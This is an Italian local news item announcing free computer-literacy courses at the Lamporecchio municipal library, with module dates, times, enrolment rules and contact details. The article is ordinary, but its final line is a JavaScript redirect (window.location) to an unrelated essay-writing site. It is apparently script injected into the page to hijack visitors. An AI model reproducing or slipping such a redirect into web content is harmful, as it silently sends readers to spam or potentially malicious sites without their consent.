LAMPORECCHIO. [a.b.] La biblioteca comunale don Siro Butelli di Lamporecchio nell’ambito delle iniziative della Redop (rete documentaria della provincia di Pistoia) organizza con il contributo della Regione Toscana corsi di alfabetizzazione informatica. Sarà proposto in particolare un percorso in sei passi per orientarsi e diventare più bravi con il personal computer:
- 1.ABC del PC, 15 e 19 settembre – ovvero i primi passi per muoversi con sicurezza fra mouse e tastiera.
- 2.Google, 22 e 26 settembre – Come usare al meglio un motore di ricerca.
- 3.Open Office Writer, 29 settembre e 3 ottobre – per imparare a usare questo programma di videoscrittura
- 4.Gmail, 6 e 10 ottobre – creare e gestire una casella di posta elettronica
- 5.Facebook, 3 e 17 ottobre – come creare un profilo e rimanere così in contatto con le persone amiche
- 6.Facebook advanced, 20 e 24 ottobre – per diventare sempre più bravi a gestire il nostro profilo facebook
Le lezioni si svolgeranno presso la sede della biblioteca: si potrà scegliere tra il martedì dalle 16 alle 17:30 o il sabato dalle 10:30 alle 12. Le iscrizioni (12 iscritti al massimo per ciascun turno) saranno accolte in ordine di arrivo dal 25 agosto al 5 di settembre ed entro l’11 settembre saranno confermate agli interessati presso i recapiti indicati sulla tessera della biblioteca.
Le lezioni sono completamente gratuite ma per partecipare l’unica condizione richiesta è infatti l’iscrizione alla biblioteca o iscriversi in occasione della richiesta di adesione al corso. Nel limite dei posti rimasti liberi, saranno ammessi a partecipare agli incontri anche coloro che non si saranno prenotati, a condizione che siano regolarmente iscritti alla biblioteca. Saranno accolte anche candidature a singoli moduli fino al massimo dei posti disponibili ma la priorità sarà data a chi frequenta l’intero ciclo.
Info: Biblioteca Comunale “Don Siro Butelli” – via della Costituzione, 13 – Lamporecchio. Telefono 0573/81281 – E-mail biblioteca@comune.lamporecchio.pt.it.
window.location = “http://paper-help24h.com”;